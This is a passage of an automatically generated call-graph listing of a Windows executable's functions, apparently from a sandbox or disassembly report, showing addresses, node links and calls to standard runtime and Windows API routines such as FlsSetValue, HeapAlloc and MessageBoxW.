7ff710f4c5c0 _log10_special 8 API calls 16502->16503 16505 7ff710f46f41 16503->16505 16504 7ff710f41840 45 API calls 16504->16517 16505->16181 16506 7ff710f46f9a 16508 7ff710f42710 54 API calls 16506->16508 16507 7ff710f41c80 49 API calls 16507->16517 16508->16502 16509 7ff710f46f87 16510 7ff710f42710 54 API calls 16509->16510 16510->16502 16511 7ff710f44550 10 API calls 16511->16517 16512 7ff710f47e10 52 API calls 16512->16517 16513 7ff710f42a50 54 API calls 16513->16517 16514 7ff710f46f74 16516 7ff710f42710 54 API calls 16514->16516 16515 7ff710f41600 118 API calls 16515->16517 16516->16502 16517->16502 16517->16504 16517->16506 16517->16507 16517->16509 16517->16511 16517->16512 16517->16513 16517->16514 16517->16515 16518 7ff710f46f5d 16517->16518 16519 7ff710f42710 54 API calls 16518->16519 16519->16502 18427 7ff710f49070 16520->18427 16522 7ff710f471b9 16523 7ff710f49070 3 API calls 16522->16523 16524 7ff710f471cc 16523->16524 16525 7ff710f471ff 16524->16525 16526 7ff710f471e4 16524->16526 16537 7ff710f4c8c0 16536->16537 16538 7ff710f42a74 GetCurrentProcessId 16537->16538 16539 7ff710f41c80 49 API calls 16538->16539 16540 7ff710f42ac7 16539->16540 16541 7ff710f549f4 49 API calls 16540->16541 16542 7ff710f42b0f 16541->16542 16543 7ff710f42620 12 API calls 16542->16543 16544 7ff710f42b31 16543->16544 16545 7ff710f4c5c0 _log10_special 8 API calls 16544->16545 18503 7ff710f46350 16554->18503 16558 7ff710f43381 16562 7ff710f43399 16558->16562 18571 7ff710f46040 16558->18571 16560 7ff710f4338d 16560->16562 16563 7ff710f43670 16562->16563 16564 7ff710f4367e 16563->16564 16565 7ff710f4368f 16564->16565 18791 7ff710f49050 FreeLibrary 16564->18791 16565->16170 16584 7ff710f5a5cc 16567->16584 16573 7ff710f5a8bf 16573->16254 16683 7ff710f554dc EnterCriticalSection 16577->16683 16585 7ff710f5a5e8 GetLastError 16584->16585 16586 7ff710f5a623 16584->16586 16587 7ff710f5a5f8 16585->16587 16586->16573 16590 7ff710f5a638 16586->16590 16597 7ff710f5b400 16587->16597 16591 7ff710f5a66c 16590->16591 16592 7ff710f5a654 GetLastError SetLastError 16590->16592 16591->16573 16593 7ff710f5a970 IsProcessorFeaturePresent 16591->16593 16592->16591 16594 7ff710f5a983 16593->16594 16675 7ff710f5a684 16594->16675 16598 7ff710f5b43a FlsSetValue 16597->16598 16599 7ff710f5b41f FlsGetValue 16597->16599 16601 7ff710f5b447 16598->16601 16603 7ff710f5a613 SetLastError 16598->16603 16600 7ff710f5b434 16599->16600 16599->16603 16600->16598 16614 7ff710f5ec08 16601->16614 16603->16586 16604 7ff710f5b456 16605 7ff710f5b474 FlsSetValue 16604->16605 16606 7ff710f5b464 FlsSetValue 16604->16606 16608 7ff710f5b480 FlsSetValue 16605->16608 16609 7ff710f5b492 16605->16609 16607 7ff710f5b46d 16606->16607 16621 7ff710f5a9b8 16607->16621 16608->16607 16627 7ff710f5af64 16609->16627 16620 7ff710f5ec19 _set_fmode 16614->16620 16615 7ff710f5ec6a 16635 7ff710f54f78 16615->16635 16616 7ff710f5ec4e HeapAlloc 16618 7ff710f5ec68 16616->16618 16616->16620 16618->16604 16620->16615 16620->16616 16632 7ff710f63600 16620->16632 16622 7ff710f5a9bd RtlFreeHeap 16621->16622 16623 7ff710f5a9ec 16621->16623 16622->16623 16624 7ff710f5a9d8 GetLastError 16622->16624 16623->16603 16625 7ff710f5a9e5 Concurrency::details::SchedulerProxy::DeleteThis 16624->16625 16626 7ff710f54f78 _set_fmode 9 API calls 16625->16626 16626->16623 16661 7ff710f5ae3c 16627->16661 16638 7ff710f63640 16632->16638 16644 7ff710f5b338 GetLastError 16635->16644 16637 7ff710f54f81 16637->16618 16643 7ff710f60348 EnterCriticalSection 16638->16643 16645 7ff710f5b379 FlsSetValue 16644->16645 16650 7ff710f5b35c 16644->16650 16646 7ff710f5b38b 16645->16646 16649 7ff710f5b369 16645->16649 16648 7ff710f5ec08 _set_fmode 5 API calls 16646->16648 16647 7ff710f5b3e5 SetLastError 16647->16637 16651 7ff710f5b39a 16648->16651 16649->16647 16650->16645 16650->16649 16652 7ff710f5b3b8 FlsSetValue 16651->16652 16653 7ff710f5b3a8 FlsSetValue 16651->16653 16655 7ff710f5b3c4 FlsSetValue 16652->16655 16656 7ff710f5b3d6 16652->16656 16654 7ff710f5b3b1 16653->16654 16657 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16654->16657 16655->16654 16658 7ff710f5af64 _set_fmode 5 API calls 16656->16658 16657->16649 16659 7ff710f5b3de 16658->16659 16660 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16659->16660 16660->16647 16673 7ff710f60348 EnterCriticalSection 16661->16673 16676 7ff710f5a6be _isindst __scrt_get_show_window_mode 16675->16676 16677 7ff710f5a6e6 RtlCaptureContext RtlLookupFunctionEntry 16676->16677 16678 7ff710f5a756 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16677->16678 16679 7ff710f5a720 RtlVirtualUnwind 16677->16679 16680 7ff710f5a7a8 _isindst 16678->16680 16679->16678 16681 7ff710f4c5c0 _log10_special 8 API calls 16680->16681 16682 7ff710f5a7c7 GetCurrentProcess TerminateProcess 16681->16682 16685 7ff710f436bc GetModuleFileNameW 16684->16685 16685->16258 16685->16259 16687 7ff710f4932f FindClose 16686->16687 16688 7ff710f49342 16686->16688 16687->16688 16689 7ff710f4c5c0 _log10_special 8 API calls 16688->16689 16690 7ff710f4371a 16689->16690 16690->16264 16690->16265 16692 7ff710f4c8c0 16691->16692 16693 7ff710f42c70 GetCurrentProcessId 16692->16693 16722 7ff710f426b0 16693->16722 16695 7ff710f42cb9 16726 7ff710f54c48 16695->16726 16698 7ff710f426b0 48 API calls 16699 7ff710f42d34 FormatMessageW 16698->16699 16701 7ff710f42d6d 16699->16701 16702 7ff710f42d7f MessageBoxW 16699->16702 16703 7ff710f426b0 48 API calls 16701->16703 16704 7ff710f4c5c0 _log10_special 8 API calls 16702->16704 16703->16702 16705 7ff710f42daf 16704->16705 16705->16262 16707 7ff710f43730 16706->16707 16708 7ff710f493b0 GetFinalPathNameByHandleW CloseHandle 16706->16708 16707->16272 16707->16273 16708->16707 16710 7ff710f42834 16709->16710 16711 7ff710f426b0 48 API calls 16710->16711 16712 7ff710f42887 16711->16712 16713 7ff710f54c48 48 API calls 16712->16713 16714 7ff710f428d0 MessageBoxW 16713->16714 16715 7ff710f4c5c0 _log10_special 8 API calls 16714->16715 16716 7ff710f42900 16715->16716 16716->16262 16718 7ff710f494da WideCharToMultiByte 16717->16718 16720 7ff710f49505 16717->16720 16719 7ff710f4951b __std_exception_destroy 16718->16719 16718->16720 16719->16271 16720->16719 16721 7ff710f49522 WideCharToMultiByte 16720->16721 16721->16719 16723 7ff710f426d5 16722->16723 16724 7ff710f54c48 48 API calls 16723->16724 16725 7ff710f426f8 16724->16725 16725->16695 16729 7ff710f54ca2 16726->16729 16727 7ff710f54cc7 16728 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16727->16728 16732 7ff710f54cf1 16728->16732 16729->16727 16730 7ff710f54d03 16729->16730 16744 7ff710f53000 16730->16744 16733 7ff710f4c5c0 _log10_special 8 API calls 16732->16733 16735 7ff710f42d04 16733->16735 16734 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16734->16732 16735->16698 16737 7ff710f54e0a 16738 7ff710f54e14 16737->16738 16741 7ff710f54de4 16737->16741 16742 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16738->16742 16739 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16739->16732 16740 7ff710f54db0 16740->16741 16743 7ff710f54db9 16740->16743 16741->16734 16742->16732 16743->16739 16745 7ff710f5303e 16744->16745 16746 7ff710f5302e 16744->16746 16747 7ff710f53047 16745->16747 16751 7ff710f53075 16745->16751 16750 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16746->16750 16748 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16747->16748 16749 7ff710f5306d 16748->16749 16749->16737 16749->16740 16749->16741 16749->16743 16750->16749 16751->16746 16751->16749 16755 7ff710f53a14 16751->16755 16788 7ff710f53460 16751->16788 16825 7ff710f52bf0 16751->16825 16756 7ff710f53ac7 16755->16756 16757 7ff710f53a56 16755->16757 16760 7ff710f53acc 16756->16760 16761 7ff710f53b20 16756->16761 16758 7ff710f53a5c 16757->16758 16759 7ff710f53af1 16757->16759 16762 7ff710f53a90 16758->16762 16763 7ff710f53a61 16758->16763 16848 7ff710f51dc4 16759->16848 16764 7ff710f53ace 16760->16764 16765 7ff710f53b01 16760->16765 16766 7ff710f53b37 16761->16766 16767 7ff710f53b2a 16761->16767 16772 7ff710f53b2f 16761->16772 16769 7ff710f53a67 16762->16769 16762->16772 16763->16766 16763->16769 16770 7ff710f53a70 16764->16770 16775 7ff710f53add 16764->16775 16855 7ff710f519b4 16765->16855 16862 7ff710f5471c 16766->16862 16767->16759 16767->16772 16769->16770 16776 7ff710f53aa2 16769->16776 16783 7ff710f53a8b 16769->16783 16786 7ff710f53b60 16770->16786 16828 7ff710f541c8 16770->16828 16772->16786 16866 7ff710f521d4 16772->16866 16775->16759 16778 7ff710f53ae2 16775->16778 16776->16786 16838 7ff710f54504 16776->16838 16778->16786 16844 7ff710f545c8 16778->16844 16780 7ff710f4c5c0 _log10_special 8 API calls 16782 7ff710f53e5a 16780->16782 16782->16751 16783->16786 16787 7ff710f53d4c 16783->16787 16873 7ff710f54830 16783->16873 16786->16780 16787->16786 16879 7ff710f5ea78 16787->16879 16789 7ff710f5346e 16788->16789 16790 7ff710f53484 16788->16790 16791 7ff710f534c4 16789->16791 16792 7ff710f53ac7 16789->16792 16793 7ff710f53a56 16789->16793 16790->16791 16794 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16790->16794 16791->16751 16797 7ff710f53acc 16792->16797 16798 7ff710f53b20 16792->16798 16795 7ff710f53a5c 16793->16795 16796 7ff710f53af1 16793->16796 16794->16791 16800 7ff710f53a90 16795->16800 16801 7ff710f53a61 16795->16801 16805 7ff710f51dc4 38 API calls 16796->16805 16806 7ff710f53b01 16797->16806 16808 7ff710f53ace 16797->16808 16799 7ff710f53b2f 16798->16799 16802 7ff710f53b37 16798->16802 16803 7ff710f53b2a 16798->16803 16813 7ff710f521d4 38 API calls 16799->16813 16823 7ff710f53b60 16799->16823 16800->16799 16804 7ff710f53a67 16800->16804 16801->16802 16801->16804 16810 7ff710f5471c 45 API calls 16802->16810 16803->16796 16803->16799 16807 7ff710f53a70 16804->16807 16812 7ff710f53aa2 16804->16812 16822 7ff710f53a8b 16804->16822 16805->16822 16811 7ff710f519b4 38 API calls 16806->16811 16809 7ff710f541c8 47 API calls 16807->16809 16807->16823 16808->16807 16814 7ff710f53add 16808->16814 16809->16822 16810->16822 16811->16822 16815 7ff710f54504 46 API calls 16812->16815 16812->16823 16813->16822 16814->16796 16816 7ff710f53ae2 16814->16816 16815->16822 16818 7ff710f545c8 37 API calls 16816->16818 16816->16823 16817 7ff710f4c5c0 _log10_special 8 API calls 16819 7ff710f53e5a 16817->16819 16818->16822 16819->16751 16820 7ff710f54830 45 API calls 16824 7ff710f53d4c 16820->16824 16821 7ff710f5ea78 46 API calls 16821->16824 16822->16820 16822->16823 16822->16824 16823->16817 16824->16821 16824->16823 17105 7ff710f51038 16825->17105 16829 7ff710f541ee 16828->16829 16891 7ff710f50bf0 16829->16891 16833 7ff710f54333 16836 7ff710f54830 45 API calls 16833->16836 16837 7ff710f543c1 16833->16837 16835 7ff710f54830 45 API calls 16835->16833 16836->16837 16837->16783 16839 7ff710f54539 16838->16839 16840 7ff710f5457e 16839->16840 16841 7ff710f54557 16839->16841 16842 7ff710f54830 45 API calls 16839->16842 16840->16783 16843 7ff710f5ea78 46 API calls 16841->16843 16842->16841 16843->16840 16846 7ff710f545e9 16844->16846 16845 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16847 7ff710f5461a 16845->16847 16846->16845 16846->16847 16847->16783 16849 7ff710f51df7 16848->16849 16850 7ff710f51e26 16849->16850 16852 7ff710f51ee3 16849->16852 16854 7ff710f51e63 16850->16854 17037 7ff710f50c98 16850->17037 16853 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16852->16853 16853->16854 16854->16783 16856 7ff710f519e7 16855->16856 16857 7ff710f51a16 16856->16857 16859 7ff710f51ad3 16856->16859 16858 7ff710f50c98 12 API calls 16857->16858 16861 7ff710f51a53 16857->16861 16858->16861 16860 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16859->16860 16860->16861 16861->16783 16863 7ff710f5475f 16862->16863 16865 7ff710f54763 __crtLCMapStringW 16863->16865 17045 7ff710f547b8 16863->17045 16865->16783 16867 7ff710f52207 16866->16867 16868 7ff710f52236 16867->16868 16870 7ff710f522f3 16867->16870 16869 7ff710f50c98 12 API calls 16868->16869 16872 7ff710f52273 16868->16872 16869->16872 16871 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16870->16871 16871->16872 16872->16783 16874 7ff710f54847 16873->16874 17049 7ff710f5da28 16874->17049 16881 7ff710f5eaa9 16879->16881 16888 7ff710f5eab7 16879->16888 16880 7ff710f5ead7 16883 7ff710f5eae8 16880->16883 16885 7ff710f5eb0f 16880->16885 16881->16880 16882 7ff710f54830 45 API calls 16881->16882 16881->16888 16882->16880 17095 7ff710f60110 16883->17095 16886 7ff710f5eb9a 16885->16886 16887 7ff710f5eb39 16885->16887 16885->16888 16889 7ff710f5f910 _fread_nolock MultiByteToWideChar 16886->16889 16887->16888 17098 7ff710f5f910 16887->17098 16888->16787 16889->16888 16892 7ff710f50c27 16891->16892 16893 7ff710f50c16 16891->16893 16892->16893 16921 7ff710f5d66c 16892->16921 16899 7ff710f5e5e0 16893->16899 16896 7ff710f50c68 16898 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16896->16898 16897 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16897->16896 16898->16893 16900 7ff710f5e5fd 16899->16900 16901 7ff710f5e630 16899->16901 16902 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16900->16902 16901->16900 16903 7ff710f5e662 16901->16903 16912 7ff710f54311 16902->16912 16905 7ff710f5e775 16903->16905 16916 7ff710f5e6aa 16903->16916 16904 7ff710f5e867 16961 7ff710f5dacc 16904->16961 16905->16904 16907 7ff710f5e82d 16905->16907 16909 7ff710f5e7fc 16905->16909 16911 7ff710f5e7bf 16905->16911 16913 7ff710f5e7b5 16905->16913 16954 7ff710f5de64 16907->16954 16947 7ff710f5e144 16909->16947 16937 7ff710f5e374 16911->16937 16912->16833 16912->16835 16913->16907 16915 7ff710f5e7ba 16913->16915 16915->16909 16915->16911 16916->16912 16928 7ff710f5a514 16916->16928 16919 7ff710f5a970 _isindst 17 API calls 16920 7ff710f5e8c4 16919->16920 16922 7ff710f5d6b7 16921->16922 16926 7ff710f5d67b _set_fmode 16921->16926 16923 7ff710f54f78 _set_fmode 11 API calls 16922->16923 16925 7ff710f50c54 16923->16925 16924 7ff710f5d69e HeapAlloc 16924->16925 16924->16926 16925->16896 16925->16897 16926->16922 16926->16924 16927 7ff710f63600 _set_fmode 2 API calls 16926->16927 16927->16926 16929 7ff710f5a52b 16928->16929 16930 7ff710f5a521 16928->16930 16931 7ff710f54f78 _set_fmode 11 API calls 16929->16931 16930->16929 16935 7ff710f5a546 16930->16935 16932 7ff710f5a532 16931->16932 16970 7ff710f5a950 16932->16970 16934 7ff710f5a53e 16934->16912 16934->16919 16935->16934 16936 7ff710f54f78 _set_fmode 11 API calls 16935->16936 16936->16932 16973 7ff710f6411c 16937->16973 16941 7ff710f5e41c 16942 7ff710f5e471 16941->16942 16944 7ff710f5e43c 16941->16944 16946 7ff710f5e420 16941->16946 17026 7ff710f5df60 16942->17026 16944->16944 17022 7ff710f5e21c 16944->17022 16946->16912 16948 7ff710f6411c 38 API calls 16947->16948 16949 7ff710f5e18e 16948->16949 16950 7ff710f63b64 37 API calls 16949->16950 16951 7ff710f5e1de 16950->16951 16952 7ff710f5e1e2 16951->16952 16953 7ff710f5e21c 45 API calls 16951->16953 16952->16912 16953->16952 16955 7ff710f6411c 38 API calls 16954->16955 16956 7ff710f5deaf 16955->16956 16957 7ff710f63b64 37 API calls 16956->16957 16958 7ff710f5df07 16957->16958 16959 7ff710f5df0b 16958->16959 16960 7ff710f5df60 45 API calls 16958->16960 16959->16912 16960->16959 16962 7ff710f5db44 16961->16962 16963 7ff710f5db11 16961->16963 16965 7ff710f5db5c 16962->16965 16967 7ff710f5dbdd 16962->16967 16964 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 16963->16964 16969 7ff710f5db3d __scrt_get_show_window_mode 16964->16969 16966 7ff710f5de64 46 API calls 16965->16966 16966->16969 16968 7ff710f54830 45 API calls 16967->16968 16967->16969 16968->16969 16969->16912 16971 7ff710f5a7e8 _invalid_parameter_noinfo 37 API calls 16970->16971 16972 7ff710f5a969 16971->16972 16972->16934 16974 7ff710f6416f fegetenv 16973->16974 16975 7ff710f67e9c 37 API calls 16974->16975 16978 7ff710f641c2 16975->16978 16976 7ff710f641ef 16981 7ff710f5a514 __std_exception_copy 37 API calls 16976->16981 16977 7ff710f642b2 16979 7ff710f67e9c 37 API calls 16977->16979 16978->16977 16982 7ff710f6428c 16978->16982 16983 7ff710f641dd 16978->16983 16980 7ff710f642dc 16979->16980 16984 7ff710f67e9c 37 API calls 16980->16984 16985 7ff710f6426d 16981->16985 16988 7ff710f5a514 __std_exception_copy 37 API calls 16982->16988 16983->16976 16983->16977 16986 7ff710f642ed 16984->16986 16987 7ff710f65394 16985->16987 16992 7ff710f64275 16985->16992 16989 7ff710f68090 20 API calls 16986->16989 16990 7ff710f5a970 _isindst 17 API calls 16987->16990 16988->16985 17000 7ff710f64356 __scrt_get_show_window_mode 16989->17000 16991 7ff710f653a9 16990->16991 16993 7ff710f4c5c0 _log10_special 8 API calls 16992->16993 16994 7ff710f5e3c1 16993->16994 17018 7ff710f63b64 16994->17018 16995 7ff710f646ff __scrt_get_show_window_mode 16996 7ff710f64a3f 16997 7ff710f63c80 37 API calls 16996->16997 17002 7ff710f65157 16997->17002 16998 7ff710f649eb 16998->16996 16998->16998 17001 7ff710f653ac memcpy_s 37 API calls 16998->17001 16999 7ff710f64397 memcpy_s 17011 7ff710f64cdb memcpy_s __scrt_get_show_window_mode 16999->17011 17012 7ff710f647f3 memcpy_s __scrt_get_show_window_mode 16999->17012 17000->16995 17000->16999 17003 7ff710f54f78 _set_fmode 11 API calls 17000->17003 17001->16996 17002->17002 17007 7ff710f653ac memcpy_s 37 API calls 17002->17007 17017 7ff710f651b2 17002->17017 17005 7ff710f647d0 17003->17005 17004 7ff710f65338 17008 7ff710f67e9c 37 API calls 17004->17008 17006 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17005->17006 17006->16999 17007->17017 17008->16992 17009 7ff710f54f78 11 API calls _set_fmode 17009->17011 17010 7ff710f54f78 11 API calls _set_fmode 17010->17012 17011->16996 17011->16998 17011->17009 17016 7ff710f5a950 37 API calls _invalid_parameter_noinfo 17011->17016 17012->16998 17012->17010 17014 7ff710f5a950 37 API calls _invalid_parameter_noinfo 17012->17014 17013 7ff710f63c80 37 API calls 17013->17017 17014->17012 17015 7ff710f653ac memcpy_s 37 API calls 17015->17017 17016->17011 17017->17004 17017->17013 17017->17015 17019 7ff710f63b83 17018->17019 17020 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17019->17020 17021 7ff710f63bae memcpy_s 17019->17021 17020->17021 17021->16941 17023 7ff710f5e248 memcpy_s 17022->17023 17024 7ff710f54830 45 API calls 17023->17024 17025 7ff710f5e302 memcpy_s __scrt_get_show_window_mode 17023->17025 17024->17025 17025->16946 17027 7ff710f5df9b 17026->17027 17028 7ff710f5dfe8 memcpy_s 17026->17028 17029 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17027->17029 17031 7ff710f5e053 17028->17031 17033 7ff710f54830 45 API calls 17028->17033 17030 7ff710f5dfc7 17029->17030 17030->16946 17032 7ff710f5a514 __std_exception_copy 37 API calls 17031->17032 17036 7ff710f5e095 memcpy_s 17032->17036 17033->17031 17034 7ff710f5a970 _isindst 17 API calls 17035 7ff710f5e140 17034->17035 17036->17034 17038 7ff710f50ccf 17037->17038 17044 7ff710f50cbe 17037->17044 17039 7ff710f5d66c _fread_nolock 12 API calls 17038->17039 17038->17044 17040 7ff710f50d00 17039->17040 17041 7ff710f50d14 17040->17041 17043 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17040->17043 17042 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17041->17042 17042->17044 17043->17041 17044->16854 17046 7ff710f547de 17045->17046 17047 7ff710f547d6 17045->17047 17046->16865 17048 7ff710f54830 45 API calls 17047->17048 17048->17046 17050 7ff710f5da41 17049->17050 17052 7ff710f5486f 17049->17052 17050->17052 17057 7ff710f63374 17050->17057 17053 7ff710f5da94 17052->17053 17054 7ff710f5daad 17053->17054 17056 7ff710f5487f 17053->17056 17054->17056 17092 7ff710f626c0 17054->17092 17056->16787 17069 7ff710f5b1c0 GetLastError 17057->17069 17060 7ff710f633ce 17060->17052 17070 7ff710f5b1e4 FlsGetValue 17069->17070 17071 7ff710f5b201 FlsSetValue 17069->17071 17072 7ff710f5b1fb 17070->17072 17089 7ff710f5b1f1 17070->17089 17073 7ff710f5b213 17071->17073 17071->17089 17072->17071 17075 7ff710f5ec08 _set_fmode 11 API calls 17073->17075 17074 7ff710f5b26d SetLastError 17076 7ff710f5b28d 17074->17076 17077 7ff710f5b27a 17074->17077 17078 7ff710f5b222 17075->17078 17079 7ff710f5a574 _CreateFrameInfo 38 API calls 17076->17079 17077->17060 17091 7ff710f60348 EnterCriticalSection 17077->17091 17080 7ff710f5b240 FlsSetValue 17078->17080 17081 7ff710f5b230 FlsSetValue 17078->17081 17082 7ff710f5b292 17079->17082 17084 7ff710f5b24c FlsSetValue 17080->17084 17085 7ff710f5b25e 17080->17085 17083 7ff710f5b239 17081->17083 17087 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17083->17087 17084->17083 17086 7ff710f5af64 _set_fmode 11 API calls 17085->17086 17088 7ff710f5b266 17086->17088 17087->17089 17090 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17088->17090 17089->17074 17090->17074 17093 7ff710f5b1c0 _CreateFrameInfo 45 API calls 17092->17093 17094 7ff710f626c9 17093->17094 17101 7ff710f66df8 17095->17101 17099 7ff710f5f919 MultiByteToWideChar 17098->17099 17104 7ff710f66e5c 17101->17104 17102 7ff710f4c5c0 _log10_special 8 API calls 17103 7ff710f6012d 17102->17103 17103->16888 17104->17102 17106 7ff710f5106d 17105->17106 17107 7ff710f5107f 17105->17107 17108 7ff710f54f78 _set_fmode 11 API calls 17106->17108 17110 7ff710f5108d 17107->17110 17113 7ff710f510c9 17107->17113 17109 7ff710f51072 17108->17109 17111 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17109->17111 17112 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17110->17112 17114 7ff710f5107d 17111->17114 17112->17114 17115 7ff710f51445 17113->17115 17117 7ff710f54f78 _set_fmode 11 API calls 17113->17117 17114->16751 17115->17114 17116 7ff710f54f78 _set_fmode 11 API calls 17115->17116 17118 7ff710f516d9 17116->17118 17119 7ff710f5143a 17117->17119 17120 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17118->17120 17121 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17119->17121 17120->17114 17121->17115 17123 7ff710f50774 17122->17123 17150 7ff710f504d4 17123->17150 17125 7ff710f5078d 17125->16287 17162 7ff710f5042c 17126->17162 17130 7ff710f4c8c0 17129->17130 17131 7ff710f42930 GetCurrentProcessId 17130->17131 17132 7ff710f41c80 49 API calls 17131->17132 17133 7ff710f42979 17132->17133 17176 7ff710f549f4 17133->17176 17138 7ff710f41c80 49 API calls 17139 7ff710f429ff 17138->17139 17206 7ff710f42620 17139->17206 17142 7ff710f4c5c0 _log10_special 8 API calls 17143 7ff710f42a31 17142->17143 17143->16326 17145 7ff710f41b89 17144->17145 17146 7ff710f50189 17144->17146 17145->16325 17145->16326 17147 7ff710f54f78 _set_fmode 11 API calls 17146->17147 17148 7ff710f5018e 17147->17148 17149 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17148->17149 17149->17145 17151 7ff710f5053e 17150->17151 17152 7ff710f504fe 17150->17152 17151->17152 17154 7ff710f5054a 17151->17154 17153 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17152->17153 17160 7ff710f50525 17153->17160 17161 7ff710f554dc EnterCriticalSection 17154->17161 17160->17125 17163 7ff710f41a20 17162->17163 17164 7ff710f50456 17162->17164 17163->16295 17163->16296 17164->17163 17165 7ff710f50465 __scrt_get_show_window_mode 17164->17165 17166 7ff710f504a2 17164->17166 17169 7ff710f54f78 _set_fmode 11 API calls 17165->17169 17175 7ff710f554dc EnterCriticalSection 17166->17175 17171 7ff710f5047a 17169->17171 17172 7ff710f5a950 _invalid_parameter_noinfo 37 API calls 17171->17172 17172->17163 17178 7ff710f54a4e 17176->17178 17177 7ff710f54a73 17179 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17177->17179 17178->17177 17180 7ff710f54aaf 17178->17180 17182 7ff710f54a9d 17179->17182 17215 7ff710f52c80 17180->17215 17184 7ff710f4c5c0 _log10_special 8 API calls 17182->17184 17183 7ff710f54b8c 17185 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17183->17185 17186 7ff710f429c3 17184->17186 17185->17182 17194 7ff710f551d0 17186->17194 17188 7ff710f54bb0 17188->17183 17190 7ff710f54bba 17188->17190 17189 7ff710f54b61 17191 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17189->17191 17193 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17190->17193 17191->17182 17192 7ff710f54b58 17192->17183 17192->17189 17193->17182 17195 7ff710f5b338 _set_fmode 11 API calls 17194->17195 17196 7ff710f551e7 17195->17196 17197 7ff710f55227 17196->17197 17198 7ff710f5ec08 _set_fmode 11 API calls 17196->17198 17203 7ff710f429e5 17196->17203 17197->17203 17353 7ff710f5ec90 17197->17353 17199 7ff710f5521c 17198->17199 17200 7ff710f5a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17199->17200 17200->17197 17203->17138 17204 7ff710f5a970 _isindst 17 API calls 17205 7ff710f5526c 17204->17205 17207 7ff710f4262f 17206->17207 17208 7ff710f49400 2 API calls 17207->17208 17209 7ff710f42660 17208->17209 17210 7ff710f4266f MessageBoxW 17209->17210 17211 7ff710f42683 MessageBoxA 17209->17211 17212 7ff710f42690 17210->17212 17211->17212 17213 7ff710f4c5c0 _log10_special 8 API calls 17212->17213 17214 7ff710f426a0 17213->17214 17214->17142 17216 7ff710f52cbe 17215->17216 17217 7ff710f52cae 17215->17217 17218 7ff710f52cc7 17216->17218 17225 7ff710f52cf5 17216->17225 17221 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17217->17221 17219 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17218->17219 17220 7ff710f52ced 17219->17220 17220->17183 17220->17188 17220->17189 17220->17192 17221->17220 17222 7ff710f54830 45 API calls 17222->17225 17224 7ff710f52fa4 17227 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17224->17227 17225->17217 17225->17220 17225->17222 17225->17224 17229 7ff710f53610 17225->17229 17255 7ff710f532d8 17225->17255 17285 7ff710f52b60 17225->17285 17227->17217 17230 7ff710f536c5 17229->17230 17231 7ff710f53652 17229->17231 17232 7ff710f536ca 17230->17232 17233 7ff710f5371f 17230->17233 17234 7ff710f53658 17231->17234 17235 7ff710f536ef 17231->17235 17236 7ff710f536cc 17232->17236 17237 7ff710f536ff 17232->17237 17233->17235 17244 7ff710f5372e 17233->17244 17253 7ff710f53688 17233->17253 17242 7ff710f5365d 17234->17242 17234->17244 17302 7ff710f51bc0 17235->17302 17238 7ff710f5366d 17236->17238 17243 7ff710f536db 17236->17243 17309 7ff710f517b0 17237->17309 17254 7ff710f5375d 17238->17254 17288 7ff710f53f74 17238->17288 17242->17238 17245 7ff710f536a0 17242->17245 17242->17253 17243->17235 17247 7ff710f536e0 17243->17247 17244->17254 17316 7ff710f51fd0 17244->17316 17245->17254 17298 7ff710f54430 17245->17298 17250 7ff710f545c8 37 API calls 17247->17250 17247->17254 17249 7ff710f4c5c0 _log10_special 8 API calls 17251 7ff710f539f3 17249->17251 17250->17253 17251->17225 17253->17254 17323 7ff710f5e8c8 17253->17323 17254->17249 17256 7ff710f532f9 17255->17256 17257 7ff710f532e3 17255->17257 17258 7ff710f5a884 _invalid_parameter_noinfo 37 API calls 17256->17258 17261 7ff710f53337 17256->17261 17259 7ff710f536c5 17257->17259 17260 7ff710f53652 17257->17260 17257->17261 17258->17261 17262 7ff710f536ca 17259->17262 17263 7ff710f5371f 17259->17263 17264 7ff710f53658 17260->17264 17265 7ff710f536ef 17260->17265 17261->17225 17266 7ff710f536cc 17262->17266 17267 7ff710f536ff 17262->17267 17263->17265 17273 7ff710f5372e 17263->17273 17283 7ff710f53688 17263->17283 17272 7ff710f5365d 17264->17272 17264->17273 17269 7ff710f51bc0 38 API calls 17265->17269 17268 7ff710f5366d 